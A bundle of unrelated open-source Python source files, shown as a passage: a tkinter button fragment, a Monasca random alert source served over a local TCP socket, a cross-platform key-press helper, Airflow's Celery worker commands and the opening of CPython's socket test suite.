btn6 = Button(app, text="Screen Shot",fg="green", command =lambda: get_sprite(15))
btn6.pack(side="left", expand="no", padx="10", pady="10")
btn7 = Button(app, text="Smile I/O",fg="blue", command =lambda: get_sprite(16))
btn7.pack(side="left", expand="no", padx="10", pady="10")
# When the GUI is closed it actives the terminate function
app.protocol("WM_DELETE_WINDOW", terminate)
app.mainloop()
|
randoms.py | #!/usr/bin/env python
# Copyright (c) 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import json
import logging
import numpy as np
import random
import six
from six.moves import socketserver
import threading as th
import time
import uuid
import voluptuous
import monasca_analytics.banana.typeck.type_util as type_util
import monasca_analytics.component.params as params
import monasca_analytics.exception.monanas as err
from monasca_analytics.source import base
from monasca_analytics.util import validation_utils as vu
logger = logging.getLogger(__name__)
class RandomSource(base.BaseSource):
"""A randomly generated data source implementation."""
def __init__(self, _id, _config):
super(RandomSource, self).__init__(_id, _config)
try:
self._configure_server()
except IOError:
raise err.MonanasInitError("Address already in use.")
except AttributeError:
raise err.MonanasInitError("Invalid generate or validate method.")
def _configure_server(self):
"""Creates and configures the Server object
The server object is configured according to
the configuration of this source module
"""
self._server = socketserver.ThreadingTCPServer(
(self._config["params"]["host"],
self._config["params"]["port"]),
MonanasTCPHandler, False)
self._server.generate = getattr(
self, "_generate_" +
self._config["params"]["model"]["name"])
# self._server.validate = getattr(
# source_model, self._config["validate"])
self._server.allow_reuse_address = True
self._server.server_bind()
self._server.server_activate()
self._server.terminate = False
self._server.generate_alerts_per_second =\
self._config["params"]["alerts_per_burst"]
self._server.generate_idle_time_between_bursts =\
self._config["params"]["idle_time_between_bursts"]
self._server_thread = th.Thread(target=self._server.serve_forever)
self._is_server_running = False
@staticmethod
def validate_config(_config):
source_schema = voluptuous.Schema({
"module": voluptuous.And(six.string_types[0],
vu.NoSpaceCharacter()),
"params": {
"host": voluptuous.And(six.string_types[0],
vu.NoSpaceCharacter()),
"port": int,
"model": {
"name": voluptuous.And(six.string_types[0],
vu.NoSpaceCharacter()),
"params": {
"origin_types": voluptuous.And([
{
"origin_type": voluptuous.And(
six.string_types[0],
vu.NoSpaceCharacter()),
"weight": voluptuous.And(
voluptuous.Or(int, float),
voluptuous.Range(
min=0, min_included=False)),
}
], vu.NotEmptyArray()),
voluptuous.Optional("key_causes"): dict
}
},
"alerts_per_burst": voluptuous.And(
int, voluptuous.Range(min=1)),
"idle_time_between_bursts": voluptuous.And(
voluptuous.Or(int, float),
voluptuous.Range(min=0, min_included=False))
}
}, required=True)
return source_schema(_config)
@staticmethod
def get_default_config():
return {
"module": RandomSource.__name__,
"params": {
"host": "localhost",
"port": 1010,
"model": {
"name": "my_model_name",
"params": {
"origin_types": [
{
"origin_type": "my_origin_type",
"weight": 1.0
}
],
}
},
"alerts_per_burst": 1,
"idle_time_between_bursts": 1.0
}
}
@staticmethod
def get_params():
return [
params.ParamDescriptor('host', type_util.String(), 'localhost'),
params.ParamDescriptor('port', type_util.Number(), 1010),
params.ParamDescriptor('model', type_util.Object({
'name': type_util.String(),
'params': type_util.Object({
'origin_types': type_util.Object(strict_checking=False)
})
})),
params.ParamDescriptor('alert_per_burst', type_util.Number(), 1),
params.ParamDescriptor('idle_time_between_bursts',
type_util.Number(), 1.0),
]
def _start_server(self):
if not self._is_server_running:
self._server_thread.start()
self._is_server_running = True
def create_dstream(self, ssc):
"""Dstream object creation
The _dstream object is created before this source is bound
to the consumers. It uses a socketTextStream, to read data from
the ThreadingTCPServer.
:type ssc: pyspark.streaming.StreamingContext
:param ssc: Spark Streaming Context
"""
self._start_server()
self._dstream = ssc.socketTextStream(
self._config["params"]["host"],
self._config["params"]["port"])
def get_feature_list(self):
raise NotImplementedError("This method needs to be implemented")
def terminate_source(self):
"""Terminates the source with a delay
Terminates the source with a delay to allow the messages
being sent by the handler to clear up.
"""
self._server.terminate = True
time.sleep(1)
self._server.server_close()
self._server_thread = None
def _generate_simple_model(self):
"""Generates an alert based on simple_model."""
current_time = int(round(time.time() * 1000))
return {
"created": current_time,
"id": str(uuid.uuid4()),
"origin": str(uuid.uuid4()),
"origin_type": self._random_origin_type(),
"data": {},
"state": "",
"updated": current_time
}
def _random_origin_type(self):
"""Randomizes the origin_type"""
origin_types = self._config[
"params"]["model"]["params"]["origin_types"]
return origin_types[self._weighted_choice(
[o["weight"] for o in origin_types])]["origin_type"]
def _weighted_choice(self, weights):
"""Gets an index chosen randomly but weighted from a list of weights"""
totals = []
running_total = 0
for w in weights:
running_total += w
totals.append(running_total)
rnd = random.random() * running_total
for i, total in enumerate(totals):
if rnd < total:
return i
@six.add_metaclass(abc.ABCMeta)
class BaseDataSourceGenerator(object):
"""An interface for random data source generators."""
@abc.abstractmethod
def __init__(self, _config):
"""BaseDataSourceGenerator constructor.
:type _config: dict
:param _config: Configuration of this source
"""
self._config = _config
self.generate = getattr(self, "generate_" +
self._config["params"]["model"]["name"])
@abc.abstractmethod
def is_burst_over(self):
"""Should return true when all the burst alerts have been generated"""
pass
def generate_simple_model(self):
"""Generate alert event that are shaped according to the simple model
"""
current_time = time.time()
return {
"created": current_time,
"id": str(uuid.uuid4()),
"origin": str(uuid.uuid4()),
"origin_type": self._pick_next_type(),
"data": {},
"state": "",
"updated": current_time
}
@abc.abstractmethod
def _pick_next_type(self):
"""Should return the next type for the simple model generation"""
pass
class LinearlyDependentDataSourceGenerator(BaseDataSourceGenerator):
"""A data source generator where alerts are linearly dependent
:raises: exception -- if the causal matrix is cyclic
"""
def __init__(self, config):
BaseDataSourceGenerator.__init__(self, config)
# Acyclic causality model
config_key_causes = self._config[
"params"]["model"]["params"]["key_causes"]
# Create the causal matrix (/graph)
self._features_names = config_key_causes.keys()
n = len(self._features_names)
self._causal_matrix = np.zeros((n, n), dtype=np.float32)
for i in range(n):
for j in range(n):
row = self._features_names[i]
col = self._features_names[j]
if col in config_key_causes[row]:
self._causal_matrix[i, j] = 1
# Triangulate the causal matrix
tmp_matrix = np.copy(self._causal_matrix)
n_t = tmp_matrix.shape[0]
while n_t != 1:
for i in range(n_t):
if np.all(tmp_matrix[i, :] == np.zeros(n_t)):
tmp_matrix[[i, 0], :] = tmp_matrix[[0, i], :]
tmp_matrix[:, [i, 0]] = tmp_matrix[:, [0, i]]
k = n - n_t
r = i + k
self._causal_matrix[
[r, k], :] = self._causal_matrix[[k, r], :]
self._causal_matrix[
:, [r, k]] = self._causal_matrix[:, [k, r]]
self._features_names[r], self._features_names[
k] = self._features_names[k], self._features_names[r]
tmp_matrix = tmp_matrix[1:, 1:]
break
if i == n_t - 1:
raise err.MonanasCyclicRandomSourceError
n_t = tmp_matrix.shape[0]
# Prepare a zero buffer that store the random values generated
# following the causal model
self._features_random_value = np.zeros(len(self._features_names))
# This stack will contains the generated values for one burst (if that
# make some sense)
self._features_stack_emitted = []
logger.debug(
"Causality Matrix (RandomSource): {0}".format(
self._causal_matrix))
def is_burst_over(self):
return len(self._features_stack_emitted) == 0
def _pick_next_type(self):
while len(self._features_stack_emitted) == 0:
# Generate more features that follows the dag defined by the causal
# matrix
n = len(self._features_names)
self._features_random_value = np.random.laplace(size=n)
for i in range(n):
self._features_random_value[
i] += np.dot(self._causal_matrix,
self._features_random_value)[i]
self._features_random_value = np.floor(self._features_random_value)
for i in range(n):
nb = np.abs(int(self._features_random_value[i]))
if nb > 0:
feature = self._features_names[i]
self._features_stack_emitted.extend(
[feature for _ in range(nb)])
return self._features_stack_emitted.pop()
class UncorrelatedDataSourceGenerator(BaseDataSourceGenerator):
"""A data source generator where alert item are not correlated.
Each item has a unique probability to be generated.
"""
def __init__(self, config):
BaseDataSourceGenerator.__init__(self, config)
self.accumulated_alerts = 0
self._config = config
def is_burst_over(self):
is_over = self.accumulated_alerts == self._config[
"params"]["alerts_per_burst"]
if is_over:
self.accumulated_alerts = 0
return is_over
def _pick_next_type(self):
self.accumulated_alerts += 1
origin_types = self._config[
"params"]["model"]["params"]["origin_types"]
origin_type = UncorrelatedDataSourceGenerator._weighted_choice(
[o["weight"] for o in origin_types])
return origin_types[origin_type]["origin_type"]
@staticmethod
def _weighted_choice(weights):
"""Gets an index chosen randomly but weighted from a list of weights"""
totals = []
running_total = 0
for w in weights:
running_total += w
totals.append(running_total)
rnd = random.random() * running_total
for i, total in enumerate(totals):
if rnd < total:
return i
class MonanasTCPHandler(socketserver.BaseRequestHandler):
"""A TCP server handler for the alert generation."""
def handle(self):
"""Handles the incoming messages."""
accumulated_alerts = 0
while True and not self.server.terminate:
alert = self.server.generate()
try:
validated_alert = self.server.validate(alert)
self.request.send(json.dumps(validated_alert) + "\n")
accumulated_alerts += 1
except voluptuous.Invalid:
logger.warn("Invalid schema for generated alerts.")
time.sleep(self.server.generate_idle_time_between_bursts)
|
key_press.py | '''This module implements non-blocking methods waiting for specific key to
be pressed. This thing is hard to do in Python without external libraries,
so forgive me for any non-working hacks below.
'''
def _windows_key_press(wanted_key, stop_event, received_cb):
'''Check for key presses from stdin in non-blocking way. Check until either
`wanted_key` was pressed or `stop_event` has been set.
If we detect `wanted_key` before `stop_event` is set, call `received_cb`
callback and return.
@param wanted_key: key to be pressed (in our case "q")
@type wanted_key: one-letter str
@param stop_event: indicate to stop reading and return
@type stop_event: threading.Event
@param received_cb: called when `wanted_key` was read
@type received_cb: empty-argument callable
'''
import msvcrt
import sys
import time
# skip if input is received from file or pipe redirection
if not sys.stdin.isatty():
return
wanted_key = wanted_key.lower()
while not stop_event.is_set():
if msvcrt.kbhit():
c = msvcrt.getwch()
if c.lower() == wanted_key:
received_cb()
break
else:
time.sleep(0.5)
def _linux_key_press(wanted_key, stop_event, received_cb):
import select
import sys
import termios
import time
import tty
# skip if input is received from file or pipe redirection
if not sys.stdin.isatty():
return
def is_data():
return select.select([sys.stdin], [], [], 0) == ([sys.stdin], [], [])
wanted_key = wanted_key.lower()
old_settings = termios.tcgetattr(sys.stdin)
try:
tty.setcbreak(sys.stdin.fileno())
while not stop_event.is_set():
if is_data():
c = sys.stdin.read(1)
if c.lower() == wanted_key:
received_cb()
break
else:
time.sleep(0.5)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)
try:
import msvcrt
get_key_press = _windows_key_press
except ImportError:
get_key_press = _linux_key_press
def test_keypress():
'''Above code is very platform specific and hackish. We'd better test it.
'''
import threading
from six import print_
from six.moves import input
stop_event = threading.Event()
was_received = [False]
def received():
was_received[0] = True
print_('You have 5 seconds to press "q". Go for it...')
thread = threading.Thread(target=get_key_press, args=['q', stop_event, received])
thread.start()
thread.join(5.0)
stop_event.set()
if was_received[0]:
print_('You have managed to press "q". Congratulations!')
else:
print_('You didn\'t press "q". What is wrong with you?!')
# test that stdin is working as expected
name = input('What is your name? ')
print_('Your name is:', name)
if __name__ == '__main__':
test_keypress()
|
celery_command.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
"""Starts Flower, Celery monitoring tool"""
options = [
"flower",
conf.get('celery', 'BROKER_URL'),
f"--address={args.hostname}",
f"--port={args.port}",
]
if args.broker_api:
options.append(f"--broker-api={args.broker_api}")
if args.url_prefix:
options.append(f"--url-prefix={args.url_prefix}")
if args.basic_auth:
options.append(f"--basic-auth={args.basic_auth}")
if args.flower_conf:
options.append(f"--conf={args.flower_conf}")
if args.daemon:
pidfile, stdout, stderr, _ = setup_locations(
process="flower",
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pidfile, -1),
stdout=stdout,
stderr=stderr,
)
with ctx:
celery_app.start(options)
else:
celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
sub_proc = _serve_logs(skip_serve_logs)
try:
celery_app.worker_main(options)
finally:
if sub_proc:
sub_proc.terminate()
@cli_utils.action_cli
def worker(args):
"""Starts Airflow Celery worker"""
if not settings.validate_session():
raise SystemExit("Worker exiting, database connection precheck failed.")
autoscale = args.autoscale
skip_serve_logs = args.skip_serve_logs
if autoscale is None and conf.has_option("celery", "worker_autoscale"):
autoscale = conf.get("celery", "worker_autoscale")
# Setup locations
pid_file_path, stdout, stderr, log_file = setup_locations(
process=WORKER_PROCESS_NAME,
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
if hasattr(celery_app.backend, 'ResultSession'):
# Pre-create the database tables now, otherwise SQLA via Celery has a
# race condition where one of the subprocesses can die with "Table
# already exists" error, because SQLA checks for which tables exist,
# then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
# EXISTS
try:
session = celery_app.backend.ResultSession()
session.close()
except sqlalchemy.exc.IntegrityError:
# At least on postgres, trying to create a table that already exist
# gives a unique constraint violation or the
# "pg_type_typname_nsp_index" table. If this happens we can ignore
# it, we raced to create the tables and lost.
pass
# backwards-compatible: https://github.com/apache/airflow/pull/21506#pullrequestreview-879893763
celery_log_level = conf.get('logging', 'CELERY_LOGGING_LEVEL')
if not celery_log_level:
celery_log_level = conf.get('logging', 'LOGGING_LEVEL')
# Setup Celery worker
options = [
'worker',
'-O',
'fair',
'--queues',
args.queues,
'--concurrency',
args.concurrency,
'--hostname',
args.celery_hostname,
'--loglevel',
celery_log_level,
'--pidfile',
pid_file_path,
]
if autoscale:
options.extend(['--autoscale', autoscale])
if args.without_mingle:
options.append('--without-mingle')
if args.without_gossip:
options.append('--without-gossip')
if conf.has_option("celery", "pool"):
pool = conf.get("celery", "pool")
options.extend(["--pool", pool])
# Celery pools of type eventlet and gevent use greenlets, which
# requires monkey patching the app:
# https://eventlet.net/doc/patching.html#monkey-patch
# Otherwise task instances hang on the workers and are never
# executed.
maybe_patch_concurrency(['-P', pool])
if args.daemon:
# Run Celery worker as daemon
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
if args.umask:
umask = args.umask
ctx = daemon.DaemonContext(
files_preserve=[handle],
umask=int(umask, 8),
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
else:
# Run Celery worker in the same process
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
"""Sends SIGTERM to Celery worker"""
# Read PID from file
if args.pid:
pid_file_path = args.pid
else:
pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
pid = read_pid_from_pidfile(pid_file_path)
# Send SIGTERM
if pid:
worker_process = psutil.Process(pid)
worker_process.terminate()
# Remove pid file
remove_existing_pidfile(pid_file_path)
|
test_socket.py | import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
